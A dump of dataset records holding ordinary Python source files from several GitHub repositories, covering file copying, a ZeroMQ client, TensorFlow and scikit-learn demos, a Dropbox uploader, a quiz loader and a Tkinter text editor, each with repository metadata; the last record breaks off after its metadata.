2019-09-11T23:24:58.000Z
|
2019-09-11T23:24:58.000Z
|
P25010-Guangzhou-Jiachengwu/week07/ex_filecopy.py
|
xiaohh2016/python-25
|
8981ba89bfb32754c3f9c881ee8fcaf13332ce51
|
[
"Apache-2.0"
] | null | null | null |
P25010-Guangzhou-Jiachengwu/week07/ex_filecopy.py
|
xiaohh2016/python-25
|
8981ba89bfb32754c3f9c881ee8fcaf13332ce51
|
[
"Apache-2.0"
] | 5
|
2019-09-11T06:33:34.000Z
|
2020-02-17T12:52:31.000Z
|
# 使用Python copy一个文件,从a目录,copy文件到b目录
import os
from pathlib import Path
import shutil
src_path=Path('a/test')
dst_path=Path('b/test')
with open(src_path,'w') as src_file:
src_file.write('abcd\n1234')
shutil.copy(src_path,dst_path)
print(os.stat(src_path))
print(os.stat(dst_path))
| 18
| 36
| 0.756944
| 51
| 288
| 4.098039
| 0.509804
| 0.133971
| 0.105263
| 0.143541
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.015444
| 0.100694
| 288
| 16
| 37
| 18
| 0.791506
| 0.114583
| 0
| 0
| 0
| 0
| 0.090551
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.3
| 0
| 0.3
| 0.2
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
fb0fe20410b5c56d7291f72bd22a841605532524
| 548
|
py
|
Python
|
vanirio/module/interface/textfield.py
|
vaniriovanhalteren/sdk-python
|
947b08fbe046d46275bf39bc95984fbf3edc0e6c
|
[
"MIT"
] | null | null | null |
vanirio/module/interface/textfield.py
|
vaniriovanhalteren/sdk-python
|
947b08fbe046d46275bf39bc95984fbf3edc0e6c
|
[
"MIT"
] | null | null | null |
vanirio/module/interface/textfield.py
|
vaniriovanhalteren/sdk-python
|
947b08fbe046d46275bf39bc95984fbf3edc0e6c
|
[
"MIT"
] | 1
|
2022-02-08T08:15:07.000Z
|
2022-02-08T08:15:07.000Z
|
from vanirio.module.interface.base import Base
class Textfield(Base):
def __init__(self, tag: str, label: str):
"""
A Textfield interface object is used as a parameter for module
software. The interface can be used for string values.
:param label: GUI label name
:param tag: Module tag name
"""
super().__init__()
self.label = label
self.tag = tag
self._type = 'TEXTFIELD'
def encode(self) -> dict:
_base = self.encode_base()
return _base
| 24.909091
| 70
| 0.600365
| 68
| 548
| 4.661765
| 0.514706
| 0.050473
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.313869
| 548
| 21
| 71
| 26.095238
| 0.843085
| 0.319343
| 0
| 0
| 0
| 0
| 0.027778
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.2
| false
| 0
| 0.1
| 0
| 0.5
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
fb1042dc49fa8be20e43a1d8892da1c69f7bf202
| 2,348
|
py
|
Python
|
utils.py
|
lanyinemt2/ST-PlusPlus
|
7c31abfcf21e390a06c4d5da1f77a9fe5ff071ed
|
[
"MIT"
] | 73
|
2021-06-10T01:12:04.000Z
|
2022-03-30T08:31:24.000Z
|
utils.py
|
lanyinemt2/ST-PlusPlus
|
7c31abfcf21e390a06c4d5da1f77a9fe5ff071ed
|
[
"MIT"
] | 12
|
2021-07-01T00:27:11.000Z
|
2022-03-17T05:09:49.000Z
|
utils.py
|
lanyinemt2/ST-PlusPlus
|
7c31abfcf21e390a06c4d5da1f77a9fe5ff071ed
|
[
"MIT"
] | 18
|
2021-06-10T11:24:31.000Z
|
2022-03-31T16:48:58.000Z
|
import numpy as np
from PIL import Image
def count_params(model):
param_num = sum(p.numel() for p in model.parameters())
return param_num / 1e6
class meanIOU:
def __init__(self, num_classes):
self.num_classes = num_classes
self.hist = np.zeros((num_classes, num_classes))
def _fast_hist(self, label_pred, label_true):
mask = (label_true >= 0) & (label_true < self.num_classes)
hist = np.bincount(
self.num_classes * label_true[mask].astype(int) +
label_pred[mask], minlength=self.num_classes ** 2).reshape(self.num_classes, self.num_classes)
return hist
def add_batch(self, predictions, gts):
for lp, lt in zip(predictions, gts):
self.hist += self._fast_hist(lp.flatten(), lt.flatten())
def evaluate(self):
iu = np.diag(self.hist) / (self.hist.sum(axis=1) + self.hist.sum(axis=0) - np.diag(self.hist))
return iu, np.nanmean(iu)
def color_map(dataset='pascal'):
cmap = np.zeros((256, 3), dtype='uint8')
if dataset == 'pascal' or dataset == 'coco':
def bitget(byteval, idx):
return (byteval & (1 << idx)) != 0
for i in range(256):
r = g = b = 0
c = i
for j in range(8):
r = r | (bitget(c, 0) << 7-j)
g = g | (bitget(c, 1) << 7-j)
b = b | (bitget(c, 2) << 7-j)
c = c >> 3
cmap[i] = np.array([r, g, b])
elif dataset == 'cityscapes':
cmap[0] = np.array([128, 64, 128])
cmap[1] = np.array([244, 35, 232])
cmap[2] = np.array([70, 70, 70])
cmap[3] = np.array([102, 102, 156])
cmap[4] = np.array([190, 153, 153])
cmap[5] = np.array([153, 153, 153])
cmap[6] = np.array([250, 170, 30])
cmap[7] = np.array([220, 220, 0])
cmap[8] = np.array([107, 142, 35])
cmap[9] = np.array([152, 251, 152])
cmap[10] = np.array([70, 130, 180])
cmap[11] = np.array([220, 20, 60])
cmap[12] = np.array([255, 0, 0])
cmap[13] = np.array([0, 0, 142])
cmap[14] = np.array([0, 0, 70])
cmap[15] = np.array([0, 60, 100])
cmap[16] = np.array([0, 80, 100])
cmap[17] = np.array([0, 0, 230])
cmap[18] = np.array([119, 11, 32])
return cmap
| 33.070423
| 106
| 0.520017
| 352
| 2,348
| 3.386364
| 0.346591
| 0.11745
| 0.082215
| 0.022651
| 0.04698
| 0.04698
| 0
| 0
| 0
| 0
| 0
| 0.114724
| 0.305792
| 2,348
| 70
| 107
| 33.542857
| 0.616564
| 0
| 0
| 0
| 0
| 0
| 0.013203
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.125
| false
| 0
| 0.035714
| 0.017857
| 0.267857
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
fb107ee4532ec8cc33a8bdd76e5d3973b9f4d818
| 3,671
|
py
|
Python
|
lib/bus/client.py
|
hoffmannmatheus/eaZy
|
d79ade0e01a23f1c6fa585ee378ed70c95976b05
|
[
"MIT",
"Unlicense"
] | 3
|
2015-01-11T15:29:48.000Z
|
2020-09-08T14:52:14.000Z
|
lib/bus/client.py
|
hoffmannmatheus/eaZy
|
d79ade0e01a23f1c6fa585ee378ed70c95976b05
|
[
"MIT",
"Unlicense"
] | null | null | null |
lib/bus/client.py
|
hoffmannmatheus/eaZy
|
d79ade0e01a23f1c6fa585ee378ed70c95976b05
|
[
"MIT",
"Unlicense"
] | null | null | null |
import zmq
import json
"""
Class used by the Client entity to communicate to the Server.
The communication channel should be configured using the three ports:
- com_port: Used to receive broadcast messages from the Server entity.
- set_port: Used to send messages/request data to the Server entity.
- res_port: Used to receive a responce from a Server.
"""
defaults = {
'host' : '127.0.0.1',
'com_port' : 5556,
'set_port' : 5557,
'res_port' : 5558
}
context = zmq.Context()
class BusClient:
def __init__(self, id, filter, opt=defaults):
"""
Constructs a new Bus Client instance.
@param id The identification of this Client.
@param filter The filter (Server id) of messages.
@param opt An object that contains the configuration for this Bus
Client. If provided, the default configurations will be set. eg:
{host="localhost", com_port=1, set_port=2, res_port=3}
"""
self.id = id
self.filter = filter
self.host = opt['host']
self.com_port = opt['com_port']
self.set_port = opt['set_port']
self.res_port = opt['res_port']
def setup(self):
"""
Prepares this Bus Server to be used. Before sending/receiving messages,
the method setup() should be called to properly setup the socket
configurations.
"""
self.context = zmq.Context()
self.sub_socket = self.context.socket(zmq.SUB)
if self.filter:
self.sub_socket.setsockopt(zmq.SUBSCRIBE, self.filter)
self.sub_socket.connect('tcp://'+self.host+':'+str(self.com_port))
return self
def check_income(self, blocking=None):
"""
Receives a message from the communication channel's Server. Tryies to
get a message from the communication channel, checking the 'com_port'
for broadcast messages from the Server.
@param blocking If false, the method will check if there is a message
and then retrun the message, if it exists, or 'nil' if no message was
received. If true, the method will block the interpreter until a new
message arrives, which then is returned.
"""
raw_data = ''
try:
raw_data = self.sub_socket.recv(zmq.NOBLOCK)
except zmq.error.Again:
return False
sender, msg = raw_data.split(' ', 1)
return json.loads(msg), sender
def send(self, data, type='send'):
"""
Send a message to the Server. Send the given message to the Server of
this communication channel, using the 'set_port'.
@param msg An object or string containing the message.
"""
msg = {'type':type, 'data':data, 'sender':self.id}
set_socket = self.context.socket(zmq.PAIR)
set_socket.connect('tcp://'+self.host+':'+str(self.set_port))
set_socket.send(json.dumps(msg))
set_socket.close()
return self
def get(self, request):
"""
Make a request for the Server. When called, a message is sent to the
Server indicating this Client has made a request. The Client will stay
blocked until the response from the Server is received on the
'res_port', and then returned.
@param request A string indicating the request (eg. 'device_list')
"""
self.send(request, 'get')
res_socket = self.context.socket(zmq.PAIR)
res_socket.bind('tcp://'+self.host+':'+str(self.res_port))
response = res_socket.recv()
res_socket.close()
return json.loads(response)['data']
| 35.990196
| 79
| 0.625443
| 496
| 3,671
| 4.544355
| 0.300403
| 0.035936
| 0.024401
| 0.030612
| 0.149068
| 0.085182
| 0.027507
| 0
| 0
| 0
| 0
| 0.008305
| 0.278398
| 3,671
| 101
| 80
| 36.346535
| 0.842582
| 0.376192
| 0
| 0.043478
| 0
| 0
| 0.067066
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.108696
| false
| 0
| 0.043478
| 0
| 0.282609
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
fb12ef0139d2387d5de8cd18fde96987527d5c7f
| 2,821
|
py
|
Python
|
ops.py
|
fivoskal/MGAN
|
2eb1407c907af5f472a80e8ae363bee57d5cfaa4
|
[
"MIT"
] | 37
|
2018-03-07T15:32:09.000Z
|
2022-03-01T06:54:06.000Z
|
ops.py
|
fivoskal/MGAN
|
2eb1407c907af5f472a80e8ae363bee57d5cfaa4
|
[
"MIT"
] | 2
|
2018-09-19T23:20:07.000Z
|
2019-06-15T13:45:54.000Z
|
ops.py
|
fivoskal/MGAN
|
2eb1407c907af5f472a80e8ae363bee57d5cfaa4
|
[
"MIT"
] | 18
|
2018-05-23T11:09:34.000Z
|
2022-03-22T08:38:13.000Z
|
from __future__ import division
from __future__ import print_function
from __future__ import absolute_import
import numpy as np
import tensorflow as tf
def lrelu(x, alpha=0.2):
return tf.maximum(x, alpha * x)
def linear(input, output_dim, scope='linear', stddev=0.01):
norm = tf.random_normal_initializer(stddev=stddev)
const = tf.constant_initializer(0.0)
with tf.variable_scope(scope):
w = tf.get_variable('weights', [input.get_shape()[1], output_dim], initializer=norm)
b = tf.get_variable('biases', [output_dim], initializer=const)
return tf.matmul(input, w) + b
def conv2d(input_, output_dim,
k_h=5, k_w=5, d_h=2, d_w=2, stddev=0.02,
name="conv2d"):
with tf.variable_scope(name):
w = tf.get_variable('weights', [k_h, k_w, input_.get_shape()[-1], output_dim],
initializer=tf.truncated_normal_initializer(stddev=stddev))
conv = tf.nn.conv2d(input_, w, strides=[1, d_h, d_w, 1], padding='SAME')
biases = tf.get_variable('biases', [output_dim], initializer=tf.constant_initializer(0.0))
# conv = tf.reshape(tf.nn.bias_add(conv, biases), conv.get_shape())
return tf.nn.bias_add(conv, biases)
def deconv2d(input_, output_shape,
k_h=5, k_w=5, d_h=2, d_w=2, stddev=0.02,
name="deconv2d", with_w=False):
with tf.variable_scope(name):
# filter : [height, width, output_channels, in_channels]
w = tf.get_variable('weights', [k_h, k_w, output_shape[-1], input_.get_shape()[-1]],
initializer=tf.random_normal_initializer(stddev=stddev))
try:
deconv = tf.nn.conv2d_transpose(input_, w, output_shape=output_shape,
strides=[1, d_h, d_w, 1])
# Support for versions of TensorFlow before 0.7.0
except AttributeError:
deconv = tf.nn.deconv2d(input_, w, output_shape=output_shape,
strides=[1, d_h, d_w, 1])
biases = tf.get_variable('biases', [output_shape[-1]],
initializer=tf.constant_initializer(0.0))
deconv = tf.reshape(tf.nn.bias_add(deconv, biases), deconv.get_shape())
if with_w:
return deconv, w, biases
else:
return deconv
def gmm_sample(num_samples, mix_coeffs, mean, cov):
z = np.random.multinomial(num_samples, mix_coeffs)
samples = np.zeros(shape=[num_samples, len(mean[0])])
i_start = 0
for i in range(len(mix_coeffs)):
i_end = i_start + z[i]
samples[i_start:i_end, :] = np.random.multivariate_normal(
mean=np.array(mean)[i, :],
cov=np.diag(np.array(cov)[i, :]),
size=z[i])
i_start = i_end
return samples
| 39.732394
| 98
| 0.611485
| 401
| 2,821
| 4.057357
| 0.246883
| 0.047326
| 0.047941
| 0.053473
| 0.411801
| 0.356484
| 0.209588
| 0.111862
| 0.111862
| 0.081131
| 0
| 0.022967
| 0.259128
| 2,821
| 70
| 99
| 40.3
| 0.755502
| 0.059553
| 0
| 0.111111
| 0
| 0
| 0.023783
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.092593
| false
| 0
| 0.092593
| 0.018519
| 0.296296
| 0.018519
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
fb1af2b6ba7c64773e3eb0f188fe914ea2ee6f01
| 1,002
|
py
|
Python
|
src/server/api/API_ingest/dropbox_handler.py
|
carlos-dominguez/paws-data-pipeline
|
5c224e1f259c079631df7d3514a873875c633221
|
[
"MIT"
] | 27
|
2019-11-20T20:20:30.000Z
|
2022-01-31T17:24:55.000Z
|
src/server/api/API_ingest/dropbox_handler.py
|
mrcrnkovich/paws-data-pipeline
|
7c0bd4c5f23276f541611cb564f2f5abbb6b9887
|
[
"MIT"
] | 348
|
2019-11-26T20:34:02.000Z
|
2022-02-27T20:28:20.000Z
|
src/server/api/API_ingest/dropbox_handler.py
|
mrcrnkovich/paws-data-pipeline
|
7c0bd4c5f23276f541611cb564f2f5abbb6b9887
|
[
"MIT"
] | 20
|
2019-12-03T23:50:33.000Z
|
2022-02-09T18:38:25.000Z
|
import dropbox
try:
from secrets_dict import DROPBOX_APP
except ImportError:
# Not running locally
print("Couldn't get DROPBOX_APP from file, trying environment **********")
from os import environ
try:
DROPBOX_APP = environ['DROPBOX_APP']
except KeyError:
# Not in environment
# You're SOL for now
print("Couldn't get DROPBOX_APP from file or environment")
class TransferData:
def __init__(self, access_token):
self.access_token = access_token
def upload_file(self, file_from, file_to):
dbx = dropbox.Dropbox(self.access_token)
with open(file_from, 'rb') as f:
dbx.files_upload(f.read(), file_to)
def upload_file_to_dropbox(file_path, upload_path):
access_token = DROPBOX_APP
transfer_data = TransferData(access_token)
file_from = file_path
file_to = upload_path # The full path to upload the file to, including the file name
transfer_data.upload_file(file_from, file_to)
| 27.833333
| 89
| 0.691617
| 140
| 1,002
| 4.685714
| 0.378571
| 0.091463
| 0.068598
| 0.045732
| 0.10061
| 0.10061
| 0.10061
| 0.10061
| 0
| 0
| 0
| 0
| 0.228543
| 1,002
| 36
| 90
| 27.833333
| 0.848642
| 0.117764
| 0
| 0.086957
| 0
| 0
| 0.144318
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.130435
| false
| 0
| 0.173913
| 0
| 0.347826
| 0.086957
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
fb1c95abaf459d4750608d1b3b3b8a20f69d8f30
| 504
|
py
|
Python
|
KNN/sklearn API.py
|
wu-huipeng/-
|
84f681f7488e45c5f357f558defbc27aaf285a16
|
[
"Apache-2.0"
] | 7
|
2019-09-09T08:55:41.000Z
|
2020-02-08T13:24:59.000Z
|
KNN/sklearn API.py
|
wu-huipeng/machine-learning
|
84f681f7488e45c5f357f558defbc27aaf285a16
|
[
"Apache-2.0"
] | null | null | null |
KNN/sklearn API.py
|
wu-huipeng/machine-learning
|
84f681f7488e45c5f357f558defbc27aaf285a16
|
[
"Apache-2.0"
] | null | null | null |
from sklearn.neighbors import KNeighborsClassifier
from sklearn.datasets import make_classification
from sklearn.model_selection import train_test_split
x , y = make_classification(n_samples=1000,n_features=40,random_state=42) #构造数据
x_train, x_test ,y_train ,y_test = train_test_split(x,y,random_state=42) #划分数据
knn = KNeighborsClassifier() #构建模型
knn.fit(x_train,y_train) #训练
pred = knn.predict(x_test) #预测值
score = knn.score(x_test,y_test) #测试分数
print(score) #score = 0.76
| 22.909091
| 81
| 0.759921
| 79
| 504
| 4.594937
| 0.468354
| 0.090909
| 0.077135
| 0.082645
| 0.088154
| 0
| 0
| 0
| 0
| 0
| 0
| 0.030162
| 0.144841
| 504
| 21
| 82
| 24
| 0.812065
| 0.065476
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.3
| 0
| 0.3
| 0.1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
fb2248e40d3ed11337557c6e7ae9b71e63c167b4
| 3,622
|
py
|
Python
|
BP.py
|
WolfMy/predict_stock
|
7af33404875d19ea93328b8f220d3bd2c0f6d2e5
|
[
"MIT"
] | 1
|
2021-09-28T02:02:05.000Z
|
2021-09-28T02:02:05.000Z
|
BP.py
|
WolfMy/predict_stock
|
7af33404875d19ea93328b8f220d3bd2c0f6d2e5
|
[
"MIT"
] | null | null | null |
BP.py
|
WolfMy/predict_stock
|
7af33404875d19ea93328b8f220d3bd2c0f6d2e5
|
[
"MIT"
] | 1
|
2020-10-13T12:13:43.000Z
|
2020-10-13T12:13:43.000Z
|
import tensorflow as tf
import numpy as np
import pandas as pd
from MACD_RSI import init_train_data
def get_batch(data, label, batch_size, num_epochs):
input_queue = tf.train.slice_input_producer([data, label], num_epochs=num_epochs, shuffle=True, capacity=32)
x_batch, y_batch = tf.train.batch(input_queue, batch_size=batch_size, num_threads=1, capacity=32, allow_smaller_final_batch=False)
return x_batch, y_batch
def BP(data_train, label_train, input_size, num_classes, learning_rate=0.001, batch_size=64, num_epochs=1000):
X = tf.placeholder(tf.float32, shape=[None, input_size])
Y = tf.placeholder(tf.float32, shape=[None, num_classes])
W1 = tf.Variable (tf.random_uniform([input_size,10], 0,1))
B1 = tf.Variable (tf.zeros([1, 10]))
hidden_y1 = tf.nn.relu (tf.matmul(X, W1) + B1)
W2 = tf.Variable (tf.random_uniform([10,7], 0,1))
B2 = tf.Variable (tf.zeros([1, 7]))
hidden_y2 = tf.nn.relu (tf.matmul(hidden_y1, W2) + B2)
W3 = tf.Variable (tf.random_uniform([7, num_classes], 0.1))
B3 = tf.Variable (tf.zeros([1, num_classes]))
final_opt = tf.nn.softmax(tf.matmul(hidden_y2, W3) + B3)
loss = tf.reduce_mean (tf.nn.softmax_cross_entropy_with_logits (labels = Y, logits = final_opt))
train_step = tf.train.AdamOptimizer(learning_rate).minimize(loss)
correct_prediction = tf.equal(tf.argmax(final_opt,1), tf.argmax(Y,1))
accuracy = tf.reduce_mean(tf.cast(correct_prediction, "float"))
x_batch, y_batch = get_batch(data_train, label_train, batch_size, num_epochs)
with tf.Session() as sess:
sess.run(tf.local_variables_initializer())
sess.run(tf.global_variables_initializer())
# 开启协调器
coord = tf.train.Coordinator()
# 使用start_queue_runners 启动队列填充
threads = tf.train.start_queue_runners(sess, coord)
epoch = 0
try:
while not coord.should_stop():
# 获取训练用的每一个batch中batch_size个样本和标签
batch_input, batch_label = sess.run([x_batch, y_batch])
sess.run (train_step, feed_dict = {X: batch_input, Y: batch_label})
if epoch % 200 == 0 :
train_accuracy = sess.run(accuracy, feed_dict = {X: batch_input, Y: batch_label})
#test_accuracy = sess.run(accuracy, feed_dict = {X: data_test, Y: label_test})
#print ("step : %d, training accuracy = %g, test_accuracy = %g " % (epoch, train_accuracy, test_accuracy))
print ("step : %d, training accuracy = %g " % (epoch, train_accuracy))
print("loss:", sess.run(loss, feed_dict={X: batch_input, Y: batch_label}))
epoch = epoch + 1
except tf.errors.OutOfRangeError: # num_epochs 次数用完会抛出此异常
print("---Train end---")
finally:
# 协调器coord发出所有线程终止信号
coord.request_stop()
coord.join(threads) # 把开启的线程加入主线程,等待threads结束
print('---Programm end---')
# 训练完成后,记录test_accuracy,返回[stock,test_accuracy]
train_accuracy = sess.run(accuracy, feed_dict = {X: batch_input, Y: batch_label})
return train_accuracy
start_date = '2018-11-20'
end_date = '2019-03-01'
stock_list = ['603000', '002230', '300492', '601688']
df = pd.DataFrame(stock_list, columns=['stock'])
train_acc = []
for stock in stock_list:
data, label = init_train_data(stock, start_date, end_date)
train_acc.append(BP(data, label, input_size=2, num_classes=3, learning_rate=0.001, batch_size=32))
df['train_acc'] = train_acc
print(df.sort_values(['train_acc'], ascending=False))
| 48.293333
| 134
| 0.655163
| 511
| 3,622
| 4.405088
| 0.311155
| 0.021324
| 0.031986
| 0.021324
| 0.257663
| 0.166148
| 0.092403
| 0.078187
| 0.051533
| 0.051533
| 0
| 0.038353
| 0.215351
| 3,622
| 75
| 135
| 48.293333
| 0.753695
| 0.099117
| 0
| 0.034483
| 0
| 0
| 0.044253
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.034483
| false
| 0
| 0.068966
| 0
| 0.137931
| 0.086207
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
fb24589362ad5872b751372ecb28f328c4ec3892
| 1,907
|
py
|
Python
|
utils.py
|
psergal/quiz
|
9420db013a4ca0662471f716ed5fc1f9cfb2502a
|
[
"MIT"
] | null | null | null |
utils.py
|
psergal/quiz
|
9420db013a4ca0662471f716ed5fc1f9cfb2502a
|
[
"MIT"
] | null | null | null |
utils.py
|
psergal/quiz
|
9420db013a4ca0662471f716ed5fc1f9cfb2502a
|
[
"MIT"
] | null | null | null |
import argparse
from pathlib import Path
import random
def get_args():
parser = argparse.ArgumentParser(description='Launching VK chat bot')
parser.add_argument('-m', '--memcached_server', default='redis-12388.c52.us-east-1-4.ec2.cloud.redislabs.com',
help='Set the server to store and retrieve questions and answers. Redislabs set default')
parser.add_argument('-c', '--memcached_charset', default='utf-8',
help='Set the charset for the stored values. utf-8 set default')
arguments = parser.parse_args()
return arguments
def get_quiz_questions():
local_path = Path('.')
quiz_path = local_path / 'quiz-questions'
quiz_files = list(quiz_path.glob('*.*'))
quiz_file = random.choice(quiz_files)
quiz_lines = quiz_file.read_text(encoding='KOI8-R').splitlines()
question_lines_dict = {line_number: file_quiz_line
for line_number, file_quiz_line in enumerate(quiz_lines, start=1)
if file_quiz_line.startswith('Вопрос') and file_quiz_line.endswith(':')}
for quiz_question in question_lines_dict:
question_text, answer_text = '', ''
q_flag = True
for quiz_text_line in quiz_lines[quiz_question::]:
if quiz_text_line and q_flag:
question_text = f'{question_text}{quiz_text_line} '
elif q_flag:
q_flag = False
continue
if not quiz_text_line and not q_flag:
break
elif quiz_text_line.startswith('Ответ:'):
continue
elif not q_flag:
answer_text = f'{answer_text}{quiz_text_line} '
question_lines_dict[quiz_question] = [question_lines_dict.get(quiz_question),
{'q': question_text, 'a': answer_text}]
return question_lines_dict
| 44.348837
| 114
| 0.624541
| 239
| 1,907
| 4.690377
| 0.372385
| 0.026762
| 0.064228
| 0.032114
| 0.039251
| 0
| 0
| 0
| 0
| 0
| 0
| 0.010182
| 0.278972
| 1,907
| 42
| 115
| 45.404762
| 0.805091
| 0
| 0
| 0.052632
| 0
| 0.026316
| 0.187205
| 0.058207
| 0
| 0
| 0
| 0
| 0
| 1
| 0.052632
| false
| 0
| 0.078947
| 0
| 0.184211
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
fb2468353432def77628e6adb7da27b64ec4c1b6
| 2,684
|
py
|
Python
|
text-editor.py
|
Shubham05178/Text-Editor
|
82fff346880bb9e2088a16af20695bb46d68d29a
|
[
"MIT"
] | 1
|
2021-09-24T16:13:14.000Z
|
2021-09-24T16:13:14.000Z
|
text-editor.py
|
Shubham05178/Text-Editor
|
82fff346880bb9e2088a16af20695bb46d68d29a
|
[
"MIT"
] | null | null | null |
text-editor.py
|
Shubham05178/Text-Editor
|
82fff346880bb9e2088a16af20695bb46d68d29a
|
[
"MIT"
] | null | null | null |
#Author Shubham Nagaria. ShubhamLabs.
#Coder.
#subhamnagaria@gmail.com
import tkinter
from tkinter import *
from tkinter import Tk, scrolledtext, filedialog, messagebox
root = Tk(className=" TextEditor-ShubhamLabs") #name your texteditor in quotes
textPad = scrolledtext.ScrolledText(root, width=100, height=80)
#Defining Menu bar and sub-commands
def about():
win = Tk()
win.wm_title("About")
frame1 = Frame(
master = win,
bg = '#800000'
)
frame1.pack(fill='both', expand='yes')
editArea = Text(
master = frame1,
wrap = WORD,
width = 30,
height = 15)
#Don't use widget.place(), use pack or grid instead, since
# They behave better on scaling the window -- and you don't
# have to calculate it manually!
editArea.pack(padx=10, pady=10, fill=BOTH, expand=True)
# Adding some text in About.
editArea.insert(INSERT,
"""
This Software was created by Shubham Nagaria as a final year undergrad at GLA University,Mathura. This software was programmed in Python 3.5. Tkinter was used to create GUI version. subhamnagaria@gmail.com, mail me for doubts, queries or any other stuff.
""")
editArea.configure(state='disable') #To make ScrolledText read-only, unlike our root window.
win.mainloop()
def save_file():
file = filedialog.asksaveasfile(mode='w')
if file != None:
# chop the last character from get, as an added extra return
data = textPad.get('1.0', END+'-1c')
file.write(data)
file.close()
def open_file():
file = filedialog.askopenfile(parent=root,mode='rb',title='Select file')
if file != None:
contents = file.read()
textPad.insert('1.0',contents)
file.close()
def exit_file():
if messagebox.askokcancel("Exit", """Are you sure you want to exit?
Shubhamlabs thanks you for using our Code."""):
root.destroy()
def begin(): #just to ensure code is running correctly.
print ("Shubhamlabs thanks you for using our code.")
#Adding menus to our text editor.
menu = Menu(root)
root.config(menu=menu)
file_menu = Menu(menu)
menu.add_cascade(label="File", menu=file_menu)
file_menu.add_command(label="New", command=begin)
file_menu.add_command(label="Open", command=open_file)
file_menu.add_command(label="Save", command=save_file)
file_menu.add_separator()
file_menu.add_command(label="Exit", command=exit_file)
help_menu = Menu(menu)
menu.add_cascade(label="Help", menu=help_menu)
help_menu.add_command(label="About", command=about)
textPad.pack()#we pack everything :P
root.mainloop() #we run script in loop.
| 32.731707
| 256
| 0.676975
| 374
| 2,684
| 4.791444
| 0.486631
| 0.035714
| 0.030692
| 0.053013
| 0.125
| 0.073661
| 0.073661
| 0
| 0
| 0
| 0
| 0.013641
| 0.207899
| 2,684
| 81
| 257
| 33.135802
| 0.829257
| 0.201192
| 0
| 0.072727
| 0
| 0
| 0.122758
| 0.012332
| 0
| 0
| 0
| 0
| 0
| 1
| 0.090909
| false
| 0
| 0.054545
| 0
| 0.145455
| 0.018182
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
fb28158cf8145cabc88ee46d040cb82c54962f04
| 787
|
py
|
Python
|
fn/instaAPI.py
|
elsou/ETSE-Warbot
|
4fd5351688e3cd81d9eeed50586027830dba0c5b
|
[
"MIT"
] | 2
|
2021-11-09T23:14:53.000Z
|
2021-11-11T01:09:28.000Z
|
fn/instaAPI.py
|
elsou/etse-warbot
|
4fd5351688e3cd81d9eeed50586027830dba0c5b
|
[
"MIT"
] | null | null | null |
fn/instaAPI.py
|
elsou/etse-warbot
|
4fd5351688e3cd81d9eeed50586027830dba0c5b
|
